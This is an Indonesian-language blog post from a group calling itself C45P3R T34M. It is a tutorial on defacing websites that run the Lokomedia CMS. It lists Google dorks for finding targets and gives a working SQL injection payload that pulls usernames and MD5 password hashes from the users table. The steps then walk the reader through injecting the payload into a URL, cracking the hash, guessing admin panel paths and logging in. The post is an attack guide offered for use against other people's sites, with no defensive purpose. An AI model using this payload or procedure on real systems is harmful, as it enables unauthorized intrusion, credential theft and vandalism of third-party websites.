Deface Metode SQL LokoMedia

Hy berjumpa lagi dengan kami di C45P3R T34M, Pada kesempatan kali ini kita akan blajar deface lagi.


Kali ini kita bakalan pakai poc sql lokomedia, Langsung simak tutorialnya di bawah ini.
Dork : inurl:/statis-1-profil.html
            inurl:/statis-2-profil.html
            inurl:/statis-3-profil.html
Exploit : 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
  •  Pertama kita cari dulu target dengan menggunakan Dork yang saya berikan di atas.
  • Jika sudah silahkan kita pilih salah satu target yang menurut kalian vuln
  • Sekarang kita tempel Exploit di belakang angkanya sobat, Contoh : http://target.co.li/statis-1-profil.html menjadi http://target.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
  • Tinggal kita tekan ctrl+u saja sobat, Dan kita coppy MD5nya
  • Nah sekarang kita tempel MD5nya ke MD5 Decrypter "CLICK HERE"
  • Sekarang tinggal kita cari aja page adminnya
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur
  •  Tinggal login deh dengan Pass dan user yang kalian dapat tadi
Semoga bermanfaat sobat ^_^

Postingan terkait:

Belum ada tanggapan untuk "Deface Metode SQL LokoMedia"

Post a Comment